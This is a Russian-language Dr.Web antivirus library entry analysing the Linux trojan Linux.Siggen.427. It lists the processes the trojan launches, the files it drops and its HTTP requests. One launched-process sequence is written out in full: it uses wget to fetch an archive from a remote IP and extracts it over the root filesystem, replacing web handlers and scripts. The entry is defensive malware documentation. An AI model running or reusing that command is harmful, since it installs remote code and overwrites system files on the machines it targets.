Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.

ПОЛЬЗОВАТЕЛЯМ

Закрыть

Круглосуточная поддержка

Напишите

Запрос через форму

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Напишите

Задать вопрос в поддержку

Ваши запросы

Все: -
Незакрытые: -
Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

RU CN DE EN ES FR IT JP KZ UZ PL BY

Закрыть

Сервисы

Сканеры

FixIt!

Dr.Web vxCube

Экспертиза ВКИ

Вирусная библиотека

База знаний

Технологии

Термины

Обучение и просвещение

Мифы

Мифы об антивирусах

Новости

Linux.Siggen.427

Добавлен в вирусную базу Dr.Web: 2018-02-16

Описание добавлено: 2018-02-16

Техническая информация

Вредоносные функции:

Выполняет трассировку процессов:

<SAMPLE>
<SAMPLE_FULL_PATH>

Запускает процессы:

/bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
<SAMPLE_FULL_PATH>
/bin/bash <SAMPLE_FULL_PATH> -c
wget -q -N http://58.215.49.94/moma/patch_all.tgz -O ./patch_all.tgz
grep . -q patch_all.tgz
grep -q \.tgz$
tar -zxf ./patch_all.tgz -C /
gzip -d
rm -rf ./patch_all.tgz

Завершает следующие процессы:

<SAMPLE>
<SAMPLE_FULL_PATH>

Выполняет операции с файловой системой:

Модифицирует права доступа к файлам:

/root/maintain
/usr/nfs/handlers/muser
/usr/www/handlers/muser
/usr/bin/jitter
/usr/nfs/inc/config.inc
/etc/auto-autofs/auto-autofs
/usr/nfs/handlers/mo
/usr/www/handlers/mo
/usr/nfs/handlers/mo2
/usr/www/handlers/mo2
/usr/nfs/handlers/ck
/usr/www/handlers/ck
/usr/nfs/handlers/sys_nfs
/home/www/index.php
/usr/nfs/index.php
/usr/nfs/handlers/videotodb.php
/usr/nfs/handlers/jstodb.php
/usr/nfs/modules/DISK_IMPORT/index.php
/usr/nfs/template/nfs/main_header.tpl.htm
/usr/nfs/template/nfs/kservice3a.js
/usr/nfs/template/nfs/style3a.css
/home/www/inc/kui3a.js
/home/www/inc/style3a.css
/home/www/kui.htm

Создает папки:

/usr/nfs
/usr/nfs/handlers
/usr/www
/usr/www/handlers
/usr/nfs/inc
/etc/auto-autofs
/home/www
/usr/nfs/modules
/usr/nfs/modules/DISK_IMPORT
/usr/nfs/template
/usr/nfs/template/nfs
/home/www/inc

Создает или модифицирует файлы:

/root/patch_all.tgz
/root/root/maintain
/root/maintain
/root/usr/nfs/handlers/muser
/usr/nfs/handlers/muser
/root/usr/www/handlers/muser
/usr/www/handlers/muser
/root/usr/bin/jitter
/usr/bin/jitter
/root/usr/nfs/inc/config.inc
/usr/nfs/inc/config.inc
/root/etc/auto-autofs/auto-autofs
/etc/auto-autofs/auto-autofs
/root/usr/nfs/handlers/mo
/usr/nfs/handlers/mo
/root/usr/www/handlers/mo
/usr/www/handlers/mo
/root/usr/nfs/handlers/mo2
/usr/nfs/handlers/mo2
/root/usr/www/handlers/mo2
/usr/www/handlers/mo2
/root/usr/nfs/handlers/ck
/usr/nfs/handlers/ck
/root/usr/www/handlers/ck
/usr/www/handlers/ck
/root/usr/nfs/handlers/sys_nfs
/usr/nfs/handlers/sys_nfs
/root/home/www/index.php
/home/www/index.php
/root/usr/nfs/index.php
/usr/nfs/index.php
/root/usr/nfs/handlers/videotodb.php
/usr/nfs/handlers/videotodb.php
/root/usr/nfs/handlers/jstodb.php
/usr/nfs/handlers/jstodb.php
/root/usr/nfs/modules/DISK_IMPORT/index.php
/usr/nfs/modules/DISK_IMPORT/index.php
/root/usr/nfs/template/nfs/main_header.tpl.htm
/usr/nfs/template/nfs/main_header.tpl.htm
/root/usr/nfs/template/nfs/kservice3a.js
/usr/nfs/template/nfs/kservice3a.js
/root/usr/nfs/template/nfs/style3a.css
/usr/nfs/template/nfs/style3a.css
/root/home/www/inc/kui3a.js
/home/www/inc/kui3a.js
/root/home/www/inc/style3a.css
/home/www/inc/style3a.css
/root/home/www/kui.htm
/home/www/kui.htm

Удаляет файлы:

/root/patch_all.tgz"

Сетевая активность:

HTTP GET-запросы:

58.###.##.94/moma/patch_all.tgz

Прочее:

Собирает информацию об оперативной памяти

Рекомендации по лечению

Linux

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру